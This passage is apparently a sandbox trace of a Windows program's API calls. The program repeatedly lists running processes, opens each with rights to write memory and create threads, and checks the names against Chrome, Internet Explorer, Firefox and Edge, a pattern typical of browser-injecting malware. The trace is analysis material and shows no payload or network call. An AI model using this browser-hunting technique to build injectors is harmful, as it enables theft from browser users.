	[0214.592] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.592] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0214.593] CloseHandle (hObject=0x188) returned 1
	[0214.593] Sleep (dwMilliseconds=0x64) 
	[0214.688] GetCurrentProcessId () returned 0x110
	[0214.688] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0214.690] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0214.691] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0214.692] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0214.692] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x43fc
	[0214.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.693] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0214.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.693] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.693] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0214.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.693] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.694] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0214.694] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x4400
	[0214.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.695] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0214.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.695] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.695] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0214.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.695] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.696] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0214.696] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x4404
	[0214.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.696] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0214.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.697] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.697] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0214.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.698] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.698] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0214.698] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x4408
	[0214.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.699] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0214.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.699] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.699] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0214.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.700] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.700] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0214.700] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x440c
	[0214.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.701] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0214.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.701] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.701] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0214.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.702] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.702] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0214.703] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x4410
	[0214.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.703] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0214.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.703] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.704] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0214.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.704] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.704] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0214.705] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x4414
	[0214.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.705] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0214.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.705] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.706] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0214.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.706] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.706] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0214.707] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x4418
	[0214.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.707] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0214.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.707] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.707] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0214.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.708] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.708] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.709] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x441c
	[0214.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.709] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.709] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.709] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.710] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.710] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.711] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x4420
	[0214.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.711] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.711] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.712] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.712] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.712] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.713] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x4424
	[0214.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.713] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.713] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.714] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.714] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.714] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.715] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x4428
	[0214.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.715] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.715] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.716] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.716] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.716] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.717] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x442c
	[0214.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.717] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.717] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.718] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.718] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.718] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.719] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x4430
	[0214.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.719] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.720] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.720] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.720] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.720] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.721] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x4434
	[0214.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.721] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.722] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.722] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.722] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.723] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0214.723] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x4438
	[0214.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.723] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0214.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.724] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.724] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0214.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.724] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.725] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.725] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x443c
	[0214.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.726] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.726] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.726] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.727] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.727] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0214.727] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x4440
	[0214.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.728] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.728] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.728] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.729] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.729] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0214.730] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x4444
	[0214.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.730] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0214.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.730] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.730] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0214.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.731] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.731] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.732] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x4448
	[0214.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.732] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.732] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.732] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.733] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.733] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0214.734] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x444c
	[0214.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.734] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0214.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.734] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.734] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0214.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.735] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.014] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0215.016] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x4450
	[0215.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.016] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0215.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.016] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.017] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0215.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.017] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.017] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0215.018] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x4454
	[0215.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.019] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0215.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.019] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.019] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0215.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.019] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.020] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0215.020] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x4458
	[0215.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.020] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0215.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.021] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.021] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0215.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
